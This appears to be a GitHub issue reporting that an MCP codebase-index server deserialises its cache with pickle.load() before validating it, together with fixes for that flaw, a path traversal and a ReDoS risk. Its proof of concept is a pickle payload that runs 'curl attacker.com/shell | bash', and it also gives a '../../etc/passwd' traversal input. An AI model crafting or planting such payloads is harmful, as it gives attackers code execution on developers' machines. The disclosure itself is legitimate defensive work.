Security: pickle.load() without integrity check enables arbitrary code execution

## Summary

The cache loading in `server.py` uses `pickle.load()` to deserialize `.codebase-index-cache.pkl` before any validation. Since `pickle.load()` executes arbitrary code at deserialization time, the `isinstance()` checks that follow offer zero protection.

## Vulnerable code

```python
# server.py lines ~183-201
def _load_cache(project_root: str) -> "ProjectIndex | None":
    path = _cache_path(project_root)
    if not os.path.exists(path):
        return None
    try:
        with open(path, "rb") as f:
            payload = pickle.load(f)   # <-- code executes HERE
        if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
            return None
        index = payload["index"]
        if not isinstance(index, PI):
            return None
        return index
```

## Attack vector

Any process with write access to the project directory can plant a malicious `.codebase-index-cache.pkl`:

```python
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell | bash",))

with open(".codebase-index-cache.pkl", "wb") as f:
    pickle.dump({"version": 1, "index": Exploit()}, f)
```

On the next MCP server start (or first tool call), `_ensure_index() -> _load_cache()` runs the payload with the privileges of the MCP server process.

A malicious actor could also commit the file to a public repo — any developer who clones it and starts the MCP server would be exploited silently.

## Suggested fix

**Option A — Replace pickle with JSON** (recommended): Serialize only the structural metadata (dicts, lists, strings, ints). Eliminates the attack surface entirely.

**Option B — SafeUnpickler with allowlist**:

```python
import pickle

_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in _SAFE_MODULES:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)

payload = SafeUnpickler(f).load()
```

## Additional findings from the same audit

- **ReDoS** in `search_codebase` (query_api.py): user-supplied regex applied to every line with no timeout. Mitigation: `regex` library with `timeout=2.0` or `signal.alarm`.
- **Path traversal in `reindex_file`** (project_indexer.py ~L186): `../../etc/passwd` not validated against root. Fix: `if rel_path.startswith(".."): raise ValueError`.
- **Ambiguous endswith matching** in `_resolve_file` (query_api.py ~L233): can return unintended files.

## Environment

Discovered during a local security audit before production deployment. Cache files added to `.gitignore` as interim mitigation. Happy to submit a PR.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Security: pickle.load() without integrity check enables arbitrary code execution #4

Summary

Vulnerable code

Attack vector

Suggested fix

Additional findings from the same audit

Environment

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Security: pickle.load() without integrity check enables arbitrary code execution #4

Description

Summary

Vulnerable code

Attack vector

Suggested fix

Additional findings from the same audit

Environment

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions